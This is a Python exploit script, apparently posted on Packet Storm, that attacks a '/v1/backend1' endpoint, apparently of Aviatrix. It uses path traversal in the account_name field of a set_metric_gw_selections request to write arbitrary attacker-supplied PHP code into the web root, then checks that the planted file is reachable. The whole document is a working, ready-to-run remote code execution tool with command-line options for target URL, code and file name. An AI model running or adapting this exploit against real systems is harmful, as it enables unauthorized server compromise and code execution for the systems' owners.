0xJoyGhoshPACKETSTORM:164461
`#!/usr/bin/env python3
import requests
from requests.structures import CaseInsensitiveDict
from colorama import Fore, Style
import argparse
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
print(f"""
βββββ ββββββ βββββ ββ βββ ββββ βββ βββ ββ βββββ ββββ ββββ ββββ ββββ
βββββ ββββββ βββββ ββ βββ ββββ βββ βββ ββ βββββ ββββ ββββ ββββ ββββ
βββββ ββββββ βββββ ββ βββ ββββ βββ βββ ββ βββββ ββββ ββββ ββββ ββββ
Author : 0xJoyGhosh
Org : System00 Security
Twitter: @0xjoyghosh
""")
try:
parser = argparse.ArgumentParser()
parser.add_argument("-u", "--url", help="Enter Target Url With scheme Ex: -u https://avaitix.target.com", type=str)
parser.add_argument("-c", "--code", help="Enter php code Ex: -c '<?php phpinfo(); ?>' ", type=str)
parser.add_argument("-n", "--name", help="Enter php code Ex: -n 'filename' ", type=str)
args = parser.parse_args()
url =f"{args.url}/v1/backend1"
except TypeError:
print("Type -h To See all the options")
except():
exit()
def exploit(url,path,code):
headers = CaseInsensitiveDict()
headers["Content-Type"] = "application/x-www-form-urlencoded"
data = f'CID=x&action=set_metric_gw_selections&account_name=/../../../var/www/php/{path}.php&data={code}'
resp = requests.post(url, headers=headers, data=data,verify=False)
stat = requests.get(f"{args.url}/v1/{path}",verify=False)
if resp.status_code==200:
if stat.status_code==200:
print(f"[ {Fore.RED} Exploited {Fore.BLACK}] [{Fore.GREEN}{args.url}/v1/{path}{Fore.BLACK} ]")
print("")
else:
print("[ Exploit successful Creating File Failed ]")
pass
else:
print(f'[{Fore.BLUE} Exploit Unsuccessful {Fore.BLUE}]')
if args.url is not None:
if args.code is not None:
if args.name is not None:
exploit(url,args.name,args.code)
else:
print('Type -h to see help Menu')
else:
print('Type -h to see help Menu')
else:
print('Type -h to see help Menu')
`